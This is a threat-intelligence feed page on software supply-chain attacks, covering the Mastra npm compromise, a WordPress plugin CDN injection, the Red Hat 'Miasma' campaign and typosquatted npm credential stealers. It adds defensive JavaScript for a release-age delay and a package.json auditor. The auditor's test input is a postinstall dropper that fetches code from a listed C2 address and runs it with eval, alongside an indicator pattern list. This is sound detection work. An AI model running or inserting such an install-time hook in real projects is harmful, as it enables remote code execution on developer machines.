Threats Tagged 'supply-chain-attack'
From package to postinstall payload: Inside the Mastra npm supply chain compromise

Microsoft Threat Intelligence discovered a large-scale npm supply chain attack that compromised more than 140 packages in the mastra and @mastra scopes. The attack began with a takeover of the ehindero npm maintainer account, which published poisoned package versions that introduced easy-day-js, a malicious typosquat of the popular dayjs library. The malicious package ran a postinstall hook that deployed an obfuscated dropper script; the dropper disabled TLS certificate verification, contacted command-and-control infrastructure at 23.254.164.92 and 23.254.164.123, and downloaded a second-stage payload. The second stage, a 41 KB cross-platform Node.js implant, installed persistence mechanisms, inventoried cryptocurrency wallets, exfiltrated browser history and host reconnaissance data, and on Windows performed reflective .NET assembly injection for fileless in-memory code execution. Because the payload ran at install time, any developer workstation or CI/CD pipeline that ran npm install after the compromise was potentially exposed, whether or not the application code ever called the package.

Source: AlienVault OTX General | 06/18/2026, 05:41:52 UTC | Added: 06/18/2026, 14:37:05 UTC
Supply Chain Attack Hits Popular WordPress Plugins Through Awesome Motive CDN

A supply chain attack compromised the Awesome Motive CDN and injected malicious JavaScript into files served by the popular WordPress plugins OptinMonster, TrustPulse, and PushEngage. The injected code ran in the browsers of logged-in WordPress administrators, created backdoor accounts, and installed a stealthy backdoor plugin that hides itself from the admin UI and allows remote code execution. Every site that loaded the compromised CDN scripts was affected, which potentially exposes millions of WordPress installations. The injection was live only briefly in June 2026 before the CDN was cleaned up, but any backdoor accounts or plugin it installed persist and must be found and removed manually.

Source: Reddit Cybersecurity | 06/15/2026, 11:36:26 UTC | Added: 06/15/2026, 11:45:03 UTC
Miasma-style supply chain attacks

Miasma-style supply chain attacks are a new category of supply chain threat that abuses the widespread use of third-party packages, CI/CD automation, and coding-agent configuration files. They are difficult to defend against even for organizations with strong security postures. This entry points to a recent blog post, linked from a Reddit cybersecurity community, that describes these emerging software supply chain risks.

Source: Reddit Cybersecurity | 06/10/2026, 03:50:11 UTC | Added: 06/10/2026, 03:55:35 UTC
VS Code Adds 2-Hour Extension Auto-Update Delay to Limit Supply Chain Attacks

Microsoft Visual Studio Code (VS Code) has introduced a two-hour delay before automatically updating extensions, to reduce the risk from software supply chain attacks. The delay applies to most extensions; extensions from trusted publishers such as Microsoft, GitHub, and OpenAI continue to update immediately. The delay gives time to detect and respond to a compromised or problematic extension release before it reaches users, and users can still update an extension immediately by hand. The change mirrors the time-delay controls recently adopted by other package managers to limit exposure to freshly published malicious package versions. It ships starting with VS Code version 1.123.

Source: Reddit Cybersecurity | 06/08/2026, 06:14:31 UTC | Added: 06/08/2026, 06:18:26 UTC
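The following is an added example, not code from VS Code, npm, or the feed entry above: the selection rule behind a minimum-release-age control, written against the `time` map of an npm registry packument (version to publish timestamp, which the registry really provides). The packument fragment and the fixed clock are constructed for the example, and pre-release versions are skipped, which is an assumption made for brevity. npm's `--before=<date>` install option applies the same idea with an explicit cut-off date.

```javascript
// Added example (not from VS Code, npm, or the feed): pick the newest stable
// version that has been public for at least `minAgeHours`. A version pushed by
// an attacker minutes ago is skipped until the delay has elapsed, which is the
// window in which a compromised release is usually noticed and pulled.

// Only plain x.y.z versions are considered; pre-releases and build tags are
// excluded (an assumption of this example, not registry behaviour).
function parseSemver(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  return m ? m.slice(1, 4).map(Number) : null;
}

function compareSemver(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// `time` is the packument's time map. Non-version keys such as "created" and
// "modified" fail parseSemver and are ignored.
function selectVersionWithMinAge(time, minAgeHours, now = new Date()) {
  const cutoff = now.getTime() - minAgeHours * 3600 * 1000;
  let best = null;
  for (const [version, published] of Object.entries(time)) {
    const sv = parseSemver(version);
    if (!sv) continue;
    if (Date.parse(published) > cutoff) continue; // still inside the delay window
    if (!best || compareSemver(sv, best.sv) > 0) best = { version, sv };
  }
  return best ? best.version : null;
}

// Constructed packument fragment: 2.1.0 was published 40 minutes before "now".
const TIME = {
  created: "2024-01-01T00:00:00.000Z",
  modified: "2026-06-08T05:30:00.000Z",
  "2.0.0": "2026-04-01T12:00:00.000Z",
  "2.0.1": "2026-05-15T09:00:00.000Z",
  "2.1.0": "2026-06-08T05:30:00.000Z",
  "3.0.0-beta.1": "2026-06-01T00:00:00.000Z",
};
const NOW = new Date("2026-06-08T06:10:00.000Z");

const delayed = selectVersionWithMinAge(TIME, 2, NOW);   // two-hour delay: "2.0.1"
const immediate = selectVersionWithMinAge(TIME, 0, NOW); // no delay: "2.1.0"
console.log({ delayed, immediate });
```

With a two-hour delay the just-published 2.1.0 is not chosen and the resolver falls back to 2.0.1; with no delay it takes 2.1.0 immediately. A delay large enough to exclude every published version returns null, which a real installer would treat as "nothing eligible yet" rather than silently falling back to the newest version.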
Red Hat npm supply chain attack "Miasma" — 32 @redhat-cloud-services packages, SLSA bypass via OIDC abuse, new GCP/Azure identity collectors

The Miasma campaign is a supply chain attack targeting Red Hat npm packages under the @redhat-cloud-services namespace. Attackers used a compromised Red Hat employee's GitHub account to push malicious commits and abused the GitHub Actions OIDC publishing workflows, so the malicious versions were published with valid SLSA provenance and passed provenance-based supply chain verification. This exposes a weakness in the trust model of npm publishing workflows: provenance attests that the build pipeline produced the package, but the pipeline's trust boundary can be circumvented upstream by whoever controls the source repository. The campaign also includes new variants that collect cloud identities from GCP and Azure, escalating from credential harvesting to active enumeration of cloud access. Attribution remains uncertain, with possible links to the publicly released TeamPCP toolkit. No known exploits in the wild or official patches have been reported yet.

Source: Reddit BlueTeam | 06/03/2026, 12:02:30 UTC | Added: 06/03/2026, 12:03:29 UTC
Typosquatted npm packages used to steal cloud and CI/CD secrets

A supply chain attack on the npm ecosystem was identified involving 14 malicious packages published under the alias vpmdhaj. The packages typosquat well-known OpenSearch, Elasticsearch, and DevOps libraries and execute their payloads through npm lifecycle hooks during installation. The payload is a two-stage credential harvester that targets AWS credentials, HashiCorp Vault tokens, GitHub Actions secrets, and npm publish tokens; it queries the AWS Instance Metadata Service and ECS task metadata and enumerates AWS Secrets Manager across multiple regions. Two stager variants were observed: an HTTP-based C2 beacon and a stealthier variant that abuses the legitimate Bun runtime. The stolen credentials enable cloud lateral movement and further downstream supply chain attacks through compromised npm maintainer identities, so the campaign specifically targets developers who work with cloud and CI/CD infrastructure.

Source: AlienVault OTX General | 05/29/2026, 06:11:38 UTC | Added: 05/29/2026, 10:48:34 UTC
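The Mastra entry and the vpmdhaj entry above both turn on the same two mechanics: a look-alike package name and an npm lifecycle hook that runs code at install time. The following is an added example, not code from the Radar feed, from Microsoft, or from any of the projects named: a small audit that checks a package.json for dependency names resembling popular packages (edit distance, or a popular name embedded in a longer one, as in easy-day-js versus dayjs) and for lifecycle hooks whose commands contain the indicators quoted in the Mastra entry (the two C2 addresses and disabled TLS verification) plus generic code-execution primitives. The popular-package list and both package.json inputs are constructed for the example; the postinstall command models the described dropper behaviour and is not the real script.

```javascript
// Added example (not the feed's or any vendor's code): audit a package.json for
// look-alike dependency names and install-time hooks carrying known indicators.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Assumed, deliberately short list of popular names to compare against.
const POPULAR = ["dayjs", "lodash", "express", "axios", "opensearch", "elasticsearch"];

// Indicators from the Mastra entry (C2 addresses, TLS verification disabled)
// plus generic primitives a dropper needs.
const IOC_PATTERNS = [
  /23\.254\.164\.92/,
  /23\.254\.164\.123/,
  /NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*0/,
  /rejectUnauthorized\s*:\s*false/,
  /\beval\s*\(/,
  /child_process/,
  /curl\s|wget\s/,
];

// Classic Levenshtein edit distance with a single rolling row.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Strip the scope and separators so "easy-day-js" becomes "easydayjs".
function normalizeName(name) {
  return name.replace(/^@[^/]+\//, "").toLowerCase().replace(/[-_.]/g, "");
}

// Dependencies that are within `maxDist` edits of a popular name, or that embed
// one; an exact match is the genuine package and is skipped.
function findTyposquats(deps, popular = POPULAR, maxDist = 2) {
  const hits = [];
  for (const dep of Object.keys(deps)) {
    const n = normalizeName(dep);
    for (const p of popular) {
      const pn = normalizeName(p);
      if (n === pn) continue;
      const d = levenshtein(n, pn);
      if (d <= maxDist) hits.push({ dep, lookalike: p, reason: `edit distance ${d}` });
      else if (n.includes(pn)) hits.push({ dep, lookalike: p, reason: "embeds popular name" });
    }
  }
  return hits;
}

// Every lifecycle hook present, with the indicator patterns its command matches.
function findLifecycleHooks(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => Object.hasOwn(scripts, h)).map((hook) => ({
    hook,
    command: scripts[hook],
    indicators: IOC_PATTERNS.filter((re) => re.test(scripts[hook])).map(String),
  }));
}

function auditPackage(pkg) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  const typosquats = findTyposquats(deps);
  const hooks = findLifecycleHooks(pkg);
  const flagged = typosquats.length > 0 || hooks.some((h) => h.indicators.length > 0);
  return { name: pkg.name, typosquats, hooks, flagged };
}

// Constructed inputs: an application pulling look-alike packages, and the
// look-alike itself with a postinstall dropper modelled on the described one.
const CONSUMER = {
  name: "example-app",
  dependencies: { "easy-day-js": "^1.0.0", lodahs: "^4.17.0", express: "^4.19.0" },
};
const LOOKALIKE = {
  name: "easy-day-js",
  scripts: {
    postinstall: `NODE_TLS_REJECT_UNAUTHORIZED=0 node -e "require('http').get('http://23.254.164.92/s',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})"`,
    test: "node test.js",
  },
};

const consumer = auditPackage(CONSUMER);   // 2 typosquats, no hooks, flagged
const lookalike = auditPackage(LOOKALIKE); // 1 postinstall hook with 3 indicators, flagged
console.log(JSON.stringify({ consumer, lookalike }, null, 2));
```

Run with node. The "embeds popular name" rule is deliberately noisy (a legitimate express-session would trip it), so in practice it is paired with an allowlist and cross-checked against the registry's publish dates and download counts. The hook scan is a triage aid, not a control: in CI the control is `npm install --ignore-scripts`, which stops lifecycle hooks from running at all, with a separate explicit build step for the few packages that genuinely need them.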